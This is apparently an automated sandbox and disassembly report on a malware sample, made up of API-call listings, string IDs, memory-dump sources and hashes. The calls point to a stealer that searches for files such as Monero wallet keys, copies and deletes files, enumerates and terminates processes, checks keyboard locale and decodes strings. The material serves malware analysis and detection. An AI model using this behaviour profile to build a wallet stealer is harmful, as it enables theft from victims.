                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004E523C,?,?,?,004E52E4,?,?,00000000,?,00000000), ref: 004C1963
                              • StrCmpCA.SHLWAPI(?,004E538C), ref: 004C19B3
                              • StrCmpCA.SHLWAPI(?,004E5434), ref: 004C19C9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004C1D80
                              • DeleteFileA.KERNEL32(00000000), ref: 004C1E0A
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C1E60
                              • FindClose.KERNEL32(000000FF), ref: 004C1E72
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 710124957ac4dfa0fd7e71e30b4feeaf9392d8bafb2d93db61933c13e6b7442d
                              • Instruction ID: 050b35f8ef0788556a05ad83a3312d03a2f0d12818f94133d9a97632fbf186bc
                              • Opcode Fuzzy Hash: 710124957ac4dfa0fd7e71e30b4feeaf9392d8bafb2d93db61933c13e6b7442d
                              • Instruction Fuzzy Hash: 7B123D719101189BCB19FB61CCB6EEE7379AF14304F4045DFA10A62291EF386B99CF69
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004E0C32), ref: 004CDF5E
                              • StrCmpCA.SHLWAPI(?,004E15C0), ref: 004CDFAE
                              • StrCmpCA.SHLWAPI(?,004E15C4), ref: 004CDFC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CE4E0
                              • FindClose.KERNEL32(000000FF), ref: 004CE4F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 78a3b4fb98dd3d63c4deff92ab50afaa8324be3aa8c25e74441b5371dfeb80e5
                              • Instruction ID: 917f536eff985e0f61cdbbfb5bfa473e12487713e6c392d43ec2308e3032331f
                              • Opcode Fuzzy Hash: 78a3b4fb98dd3d63c4deff92ab50afaa8324be3aa8c25e74441b5371dfeb80e5
                              • Instruction Fuzzy Hash: A4F11C719201189ACB29EB61CCB5EEE7379BF14304F4041DFA14A62291EF387B99CF59
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004E15A8,004E0BAF), ref: 004CDBEB
                              • StrCmpCA.SHLWAPI(?,004E15AC), ref: 004CDC33
                              • StrCmpCA.SHLWAPI(?,004E15B0), ref: 004CDC49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CDECC
                              • FindClose.KERNEL32(000000FF), ref: 004CDEDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 7f1de8939294286fd7a5b9a492103d3a7ad057280ce87f3e9ef8acb6a5c8d8e2
                              • Instruction ID: 25f0a568271816746e1f91e536f26eb65404825618b0433007b48b5d3122ac11
                              • Opcode Fuzzy Hash: 7f1de8939294286fd7a5b9a492103d3a7ad057280ce87f3e9ef8acb6a5c8d8e2
                              • Instruction Fuzzy Hash: EF918776A0010497CB14FB71DD66EED737DAF84304F00866FF90656285EE38AB19CB9A
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D9905
                              • Process32First.KERNEL32(004C9FDE,00000128), ref: 004D9919
                              • Process32Next.KERNEL32(004C9FDE,00000128), ref: 004D992E
                              • StrCmpCA.SHLWAPI(?,004C9FDE), ref: 004D9943
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D995C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D997A
                              • CloseHandle.KERNEL32(00000000), ref: 004D9987
                              • CloseHandle.KERNEL32(004C9FDE), ref: 004D9993
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              • Opcode ID: 35c1416e1cef826dd7993a1b0f7c4067812211021f6ab99f50777453a76050a4
                              • Instruction ID: 4363285fb206f566a6d6dd7643f8d2690bafda7cdad6a9d451781ffcfd234fd4
                              • Opcode Fuzzy Hash: 35c1416e1cef826dd7993a1b0f7c4067812211021f6ab99f50777453a76050a4
                              • Instruction Fuzzy Hash: DA111FB5A14208ABCB28DFA4DC58BDEB778BB48700F0085CEF505A6350D7789E85CF94
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ({[$9[w$hC?$sj}\$)v$G`$G`$h(
                              • API String ID: 0-4088498789
                              • Opcode ID: 0760165e633035807160421b2cfae846b9a1652f34f9655055752c2e4d7689be
                              • Instruction ID: 1513373e027bdf825f2b2ada0f1b76916defaba9dee0ba159ef155ee130bf277
                              • Opcode Fuzzy Hash: 0760165e633035807160421b2cfae846b9a1652f34f9655055752c2e4d7689be
                              • Instruction Fuzzy Hash: D1B2E5F360C2049FE304AF29EC8567ABBE9EF94720F16893DE6C487344EA3558418797
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • GetKeyboardLayoutList.USER32(00000000,00000000,004E05B7), ref: 004D7D71
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004D7D89
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004D7D9D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004D7DF2
                              • LocalFree.KERNEL32(00000000), ref: 004D7EB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: c1278b1b3e9aee2763a23cad55c0120a13e151f5b94779621b5c36321583dce6
                              • Instruction ID: 20073e825b4702ecf4d259ac35f2869a9dc205c4fca2f0ca0c9f6adef9e80ac2
                              • Opcode Fuzzy Hash: c1278b1b3e9aee2763a23cad55c0120a13e151f5b94779621b5c36321583dce6
                              • Instruction Fuzzy Hash: F0415F71950218ABCB24DB94DCA9BEEB774FF44704F2041DBE10962290DB782F85CF69
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #&y{$<6o>$? k$SrG?$\]k$j/oO$pCg.
                              • API String ID: 0-1613382923
                              • Opcode ID: 20a47a26ede6d5814d2d775fa0afc4444f8dbc109e6f59efb886091e84703047
                              • Instruction ID: a86603ec0ff8df57029f60a55b4d39c0af4da23c272e8e3f91d7662380a87a2a
                              • Opcode Fuzzy Hash: 20a47a26ede6d5814d2d775fa0afc4444f8dbc109e6f59efb886091e84703047
                              • Instruction Fuzzy Hash: EAB248F3A0C2049FE7086E2DEC8567ABBE9EF94320F16463DE6C5C3344EA7558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &"&9$*f?6$5z<~$L,n{$Q={$]{>$ik
                              • API String ID: 0-2664790054
                              • Opcode ID: c482a8577b0e366cfe4e4dcc81fd252b285b7a1c65b3a8a473148bd58d433bac
                              • Instruction ID: 9214120592e2cee7308da776c7bb3fea6dc1e3cec131b039b95082217af3cae8
                              • Opcode Fuzzy Hash: c482a8577b0e366cfe4e4dcc81fd252b285b7a1c65b3a8a473148bd58d433bac
                              • Instruction Fuzzy Hash: 37B20AF3A0C210AFE3046E2DDC4567ABBE9EF94720F1A893DE6C4C7744E63558058796
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #KC?$'8;u$9Wi$Dce=$GKW$n&{$G
                              • API String ID: 0-34963066
                              • Opcode ID: 47ebd70e525c65c70563ca61fa247064b041422d7884fbfb24c459728eccd2c5
                              • Instruction ID: 4fbdb47fab45c6baa3d709fad9fb8d4cc67d6ab6164f982793ac7afaf34101a9
                              • Opcode Fuzzy Hash: 47ebd70e525c65c70563ca61fa247064b041422d7884fbfb24c459728eccd2c5
                              • Instruction Fuzzy Hash: 08B237F360C2049FE3086E2DEC8567ABBE9EF94320F16493DEAC5C7744EA3558418697
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004E0D79), ref: 004CE5A2
                              • StrCmpCA.SHLWAPI(?,004E15F0), ref: 004CE5F2
                              • StrCmpCA.SHLWAPI(?,004E15F4), ref: 004CE608
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CECDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 4d3cc007497ba389dcbb6518ffa261ca1406430c8350ae0defb8b87c38c0b7d7
                              • Instruction ID: eb7de5508b472a42271eb5ba524c2a2fd3f91ca161f0fc96dc74347f2a86abff
                              • Opcode Fuzzy Hash: 4d3cc007497ba389dcbb6518ffa261ca1406430c8350ae0defb8b87c38c0b7d7
                              • Instruction Fuzzy Hash: B0126F32A101189BCB18FB61CCB6EED7379AF54304F4045AFB10A52295EF386F59CB5A
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA23F
                              • LocalAlloc.KERNEL32(00000040,?,?,?,004C4F3E,00000000,?), ref: 004CA251
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA27A
                              • LocalFree.KERNEL32(?,?,?,?,004C4F3E,00000000,?), ref: 004CA28F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: >OL
                              • API String ID: 4291131564-3644805113
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $q1H$*R}o$SDis$V"9$_m~~
                              • API String ID: 0-2716215135
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,?y{$7<_$U0}o$a0ri$nU~}
                              • API String ID: 0-3470698434
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _q}$;7?$;q~$_5*$ru
                              • API String ID: 0-3192713602
                              Strings
                              Memory Dump Source
